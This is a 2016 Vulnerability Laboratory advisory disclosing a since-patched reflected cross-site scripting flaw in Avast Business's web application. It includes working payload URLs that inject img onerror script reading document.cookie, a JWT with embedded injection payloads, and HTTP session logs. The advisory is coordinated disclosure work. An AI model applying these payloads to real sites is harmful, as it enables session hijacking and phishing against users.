Document Title:
===============
AVAST Business #14 - Client Side Cross Site Vulnerability


Date:
=====
2016-05-23


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1624


VL-ID:
=====
1624


Common Vulnerability Scoring System:
====================================
3.3


Introduction:
=============
Avast security software products are developed for Microsoft Windows, Mac OS X, Android and Linux users by AVAST Software s.r.o., a Czech private limited company. 
Avast was founded in 1988, and is headquartered in Prague, Czech Republic. It produces antivirus and security programs for personal and commercial use. In January 
2015, Avast had 21.4% of the worldwide security vendor market share. As of March 2015, Avast had 233 million users of its products and services worldwide. According 
to a company press release, Avast protects more than 30 percent of the consumer PCs in the world outside of China. The software products have a user interface available 
in 45 languages. Avast has 500 employees; 90 percent of whom work in the Czech Republic. Avast has 13 offices in Prague, Brno, Germany, China, South Korea, Taiwan & U.S.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Avast_%28software_company%29 )


Abstract:
=========
An independent vulnerability laboratory researcher discovered a client-side cross site scripting web vulnerability in the official Avast Business online service web-application.


Report-Timeline:
================
2015-10-27: Researcher Notification & Coordination (Kieran Claessens)
2015-10-27: Vendor Notification (AVAST Security Team - Bug Bounty Program)
2015-11-02: Vendor Response/Feedback (AVAST Security Team - Bug Bounty Program)
2015-11-24: Vendor Fix/Patch (AVAST Developer Team)
2016-05-23: Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
AVAST!
Product: Business - Online Service (Web-Application) v2015 Q4


Exploitation-Technique:
=======================
Remote


Severity:
=========
Medium


Details:
========
A client-side cross site scripting web vulnerability has been discovered in the official Avast Business online service web-application.
The client-side vulnerability allows remote attacker to inject script codes to compromise client-side browser to application requests.

The vulnerability is located in the `error` parameter of the exception-handling in the avast business online-service web-application. Remote attackers are 
able to inject script code to manipulate client-side GET methods request to the avast business website. The injetction point is the error value of the 
exception and the execution of the injected script code occurs in the error message context. The attack vector of the vulnerability is client-side and 
the request method to inject or execute is GET.

The security risk of the client-side cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. 
Exploitation of the client-side cross site scripting web vulnerability requires no privilege web application user account and low or medium user interaction. 
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of 
malicous script codes or client-side manipulation of affected or connected modules.

Request Method(s):
				[+] GET

Vulnerable Module(s):
				[+] Avast - Business

Vulnerable Parameter(s):
				[+] #error

Affected Module(s):
				[+] Error - Exception Handling (Web-Server)


Proof of Concept:
=================
The client-side cross site vulnerability can be exploited by remote attackers without privileged web-application user account and with low or medium user interaction. 
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Link (Intercepted):
https://support.business.avast.com/access/jwtjwt=eyJhbGciOiJIUzI1NiJ9.eyJyZW1vdGVfcGhvdG9fdXJsIjoiaHR0cHM
6XC9cL2lkLmF2YXN0LmNvbVwvYXZ0XC8wMTQwZTMzMTMyZWE0YjEzMTNmMGQxNGM0ODU1Yzc3OWJlNThlZjdiNmY1YjE0NDVkODc5Y2MwM
jQ1NzMxOGY2IiwidXNlcl9maWVsZHMiOnsibnVtYmVyX29mX2RldmljZXMiOjAsInB1cmNoYXNlZF9zdXBwb3J0IjpmYWxzZSwiY291bnR
yeSI6IkJlbGdpdW0iLCJ3ZWJzaXRlIjoiaHR0cDpcL1wvd3d3Lmdvb2dsZS5jb20iLCJhZGRyZXNzIjoiXCI-PGltZyBzcmM9XCJYXCIgb
25lcnJvcj1cImFsZXJ0KDEpXCIXG5cIj48aW1nIHNyYz1cIlhcIiBvbmVycm9yPVwiYWxlcnQoMSlcIj5cbjkwMDAiLCJwdXJjaGFzZWRfc2V
jdXJlbGluZSI6ZmFsc2UsImluZHVzdHJ5IjoiQ09OU1VMVEFOQ1kiLCJwcmVtaXVtX3N1YnNjcmlwdGlvbiI6ZmFsc2UsInB1cmNoYXNlZF9pb
nN0YWxsYXRpb24iOmZhbHNlLCJudW1iZXJfb2ZfZW1wbG95ZWVzIjoiMSAtIDUiLCJwaG9uZSI6IjEzMDAyOTkxMTEiLCJjb21wYW55X25hbWUiOiJCaX
RzZWNcIj48aW1nIHNyYz1cIlhcIiBvbmVycm9yPVwiYWxlcnQoMSlcIj4ifSwibmFtZSI6InNlY3VyaXR5QGtpZXJhbmNsYWVzc2Vucy5iZSIsI
mV4dGVybmFsX2lkIjoiT3BRcV9xdkZTeW1fVDNiNjVsS3lmZzlFUU5EeHYwY1ZqM3BQZjVIZV9vSSIsImlhdCI6MTQ0NTY5MTQ4MSwiZW1haWwiOiJzZWN1cm
l0eUBraWVyYW5jbGFlc3NlbnMuYmUiLCJqdGkiOiIwZjc4NmI2OS03MWE4LTRlMmUtOGIzOS05NjVhNDVmYTZjODcifQ.CDST0tmNRXkc4N7zxJ6wHZ31WCyasEMdabYjeBNhv98


Link (Error Redirect)
https://business.avast.com/public/#error/911/Invalid%20iat%20parameter.%20The%20supplied%20iat%20value%20is%20more%20than%203%20minutes%20off,%20check%20your%20server%20clock.


Link PoC:
https://business.avast.com/public/#error/911/letsxssthis"><img src="K" onerror="alert(document.cookie)">
https://business.avast.com/public/#error/911/letsxssthis"><img src="K" onerror="alert(document.domain)">


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET https://business.avast.com/public/K Load Flags[LOAD_NORMAL] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[business.avast.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0]
      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://business.avast.com/public/]
      Cookie[_ga=GA1.3.1707638216.1445943077; _gat_UA-58120669-2=1]
      Connection[keep-alive]
Response Header:
      Server[nginx/1.6.2]
      Date[Tue, 27 Oct 2015 10:53:31 GMT]
      Content-Type[text/html]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      X-Frame-Options[SAMEORIGIN]
      x-content-type-options[nosniff]
      Strict-Transport-Security[max-age=31536000; includeSubdomains;]
      X-XSS-Protection[1; mode=block]
      Content-Encoding[gzip]


Reference(s):
https://business.avast.com/
https://business.avast.com/public/
https://business.avast.com/public/#error/


Risk:
=====
The security risk of the client-side cross site scripting web vulnerability in the avast business web-application is estimated as medium. (CVSS 3.3)


Credits:
========
Kieran Claessens - [http://www.vulnerability-lab.com/show.php?user=Kieran%20Claessens]


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 				- admin@evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™